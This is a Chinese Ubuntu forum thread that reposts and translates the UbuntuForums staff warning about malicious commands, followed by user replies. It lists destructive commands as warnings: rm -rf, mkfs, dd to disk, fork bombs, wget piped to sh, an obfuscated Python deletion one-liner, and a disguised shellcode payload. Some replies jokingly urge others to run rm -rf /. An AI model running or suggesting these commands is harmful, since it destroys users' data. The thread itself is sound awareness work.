请不要执行如下类似命令--Ubuntu危险命令

karron · #1

最近ubuntu官方论坛发出了官方通告, 列出下列危险命令, 告诫用户不要执行, 并对随意张贴下列命令的帐号处以直接封号的处罚.

再次声明, 请不要执行下列或类似下列的命令, 这些命令将会对你的计算机造成严重影响.

请不要以什么给普通用户教训来提高他们的安全意识等等托词来为自己不怀好意的行为作为借口!

http://ubuntuforums.org/announcement.php?a=54

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
下列命令会删除所有文件, 删除当前目录, 删除当前目录下面的文件.

代码：全选

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
下列命令会摧毁整个文件系统, 重建分区.

代码：全选

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
下列命令会清空整个硬盘.

代码：全选

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
下列命令会启动大量进程, 导致系统无法响应, 只能硬重启机器, 可能会导致数据损害.

代码：全选

:(){:|:&};:

In Perl

代码：全选

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
不要执行你不信任的人提供的shell脚本, 里面可能含有危险的命令和脚本, 不要随意解压别人提供的压缩包, 也许看起来很小, 结果解压出来会塞满整个硬盘.

代码：全选

wget http://some_place/some_file
sh ./some_file

代码：全选

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

不要编译运行别人提供的不明代码

代码：全选

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:

代码：全选

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.

yiding_he · #2

喂，那些说明文字还是要翻译一下的啦。

cnbeta 上的牛人马上就找出来了：《Running rm -rf / on Linux》
http://www.youtube.com/watch?v=D4fzInlyYQo

如果不知道运行 rm -rf / 的后果，看看这里吧。

stlxv · #3

拜托，不要只翻译（而且只是段章取意的翻译）讲到危害的那一部分行不？

原文有很多有价值的内容都丢了，而且你改变了很多原文的内容！

carbont · #4

yiding_he 写了：喂，那些说明文字还是要翻译一下的啦。

cnbeta 上的牛人马上就找出来了：《Running rm -rf / on Linux》
http://www.youtube.com/watch?v=D4fzInlyYQo

如果不知道运行 rm -rf / 的后果，看看这里吧。

这个比较帅……
什么时候我也干一次得了──等我这个电脑给其他人用，对方又要XP的时候吧！
呵呵

karron · #5

stlxv 写了：拜托，不要只翻译（而且只是段章取意的翻译）讲到危害的那一部分行不？

原文有很多有价值的内容都丢了，而且你改变了很多原文的内容！

原文就贴在这里的, 我丢了什么?原文我是原封不动地贴在这里的, 除了开头的那边的一些版规告诫什么的没有贴. 这么长篇的文章, 我没有精力去完全翻译, 只是把危害写出来大家看看就可以. 如果要更进一步了解原理, 原文也在这里, 自己看英文就好了.

如果谁愿意全部翻译, 可以直接跟帖或者改原帖.

yiding_he · #6

karron 写了：
stlxv 写了：拜托，不要只翻译（而且只是段章取意的翻译）讲到危害的那一部分行不？

原文有很多有价值的内容都丢了，而且你改变了很多原文的内容！
原文就贴在这里的, 我丢了什么?原文我是原封不动地贴在这里的, 除了开头的那边的一些版规告诫什么的没有贴. 这么长篇的文章, 我没有精力去完全翻译, 只是把危害写出来大家看看就可以. 如果要更进一步了解原理, 原文也在这里, 自己看英文就好了.

如果谁愿意全部翻译, 可以直接跟帖或者改原帖.

下面是我对原贴前面那段的翻译：

ATTENTION ALL USERS: Malicious Commands
所有用户注意：危险命令

I'd like to take a moment of your time to discuss a recent disturbing trend the staff has been noticing on the forums, and also take this as an opportunity to raise awareness of this situation through education.
我想花点时间讨论一下我们最近注意到的在论坛出现的一些乱象，同时希望通过相关指导，能够使得这种情况得到大家的关注。

We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.
我们最近发现在论坛的发帖中出现了一些危险命令，而且它们的数量有上升的趋势。别装傻，我知道你懂我说的话——这些命令有可能造成大规模的破坏，甚至令计算机崩溃。

I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. If you post one of them, particularly in a support thread disguised as advice, expect to be instantly and permanently BANNED, at the account, e-mail, IP, or ISP level. I do not care about intent -- if you mean it as a joke, it is not funny. If you mean it as a lesson, go teach it somewhere else. This behavior is absolutely against the Forum Guidelines and Ubuntu Code of Conduct.
我在此警告那些这么做的人：Ubuntu论坛绝不容许发布危险命令。如果你发布了危险命令，特别是在求助帖中将危险命令作为建议提供出来，你将会立刻被永久禁止，包括帐号、邮件、IP地址，或者甚至ISP。我不管你的意图是什么——如果你是开玩笑，那这里不是你开玩笑的地方；如果你想教别人这个命令，那么请到别的地方去教。因为这种行为完全违反了我们论坛的指导方针和Ubuntu的行为准则。

I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect.
同时我也提醒用户们：如果有人告诉你要解决某个问题需要运行某个命令或者下载执行某个脚本，请提高警惕。如果您对其抱有怀疑，请稍做等待，看看其他人怎么说，或者要求他做出合理的解释，或者查阅相关文档（例如man文档）。虽然我们努力争取尽快回答大家的问题，但并不一定每次都做得到。

Regards,

The UbuntuForums Staff.

As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.
经一些论坛用户的要求，同时也为提醒大家，我们列出一些危险命令的例子，这些例子极其危险，如果您的机器上有重要数据，请不要运行它们——这些命令甚至能够在LiveCD环境下对计算机造成破坏。

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.
再次提醒大家，这些都是危险命令——看看可以，但不要去试。

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".
当然，其实这个列表很不完整，但是您看看这些之后，就会对那些欺骗您的命令有个大概印象。要知道这些命令很可能就藏在一大段的脚本中，所以当您觉得它们不对劲时，您就应该提高警惕了。

bones7456 · #7

其实,只要不用 sudo ,一切都好商量....

yiding_he · #8

bones7456 写了：其实,只要不用 sudo ,一切都好商量....

不用 sudo？这个就不太好商量了。

yysq009 · #9

一般来说，人都有猎奇心里。你说不能的吧，他偏要去尝试一下。。。。

:em72

me · #10

代码：全选

rm -rf /

上面的代码千万不要执行，除非你知道自己在做什么

上述代码是不是只删除根分区的文件
/media/sda1 之类的挂载分区里的文件会不会删除呢？

xiehuoli · #11

LS可以去试试阿
嘿嘿
根分区都给你删除了，你想想会怎么样

stlxv · #12

xiehuoli 写了：LS可以去试试阿
嘿嘿
根分区都给你删除了，你想想会怎么样

${L_SMILIES_LAUGHING}$ 放心地执行吧

结果不可能是所有文件都被你删除，不信你试试 ${L_SMILIES_WINK}$

windwiny · #13

....楼上不要玩火啊，为数不多的班图女被禁了可不好

stlxv · #14

windwiny 写了：....楼上不要玩火啊，为数不多的班图女被禁了可不好

${L_SMILIES_ROLLING_EYES}$ 我又没叫她去做。再说他做了关我啥事。

反正俺是做过的。

${L_SMILIES_ROLLING_EYES}$

xiehuoli · #15

stlxv 写了：
windwiny 写了：....楼上不要玩火啊，为数不多的班图女被禁了可不好
${L_SMILIES_ROLLING_EYES}$ 我又没叫她去做。再说他做了关我啥事。

反正俺是做过的。

${L_SMILIES_ROLLING_EYES}$

我当年把自己的/etc给 chmod -R 777 /etc了
那个爽阿，越用你就发现，问题越多，这个才是最牛的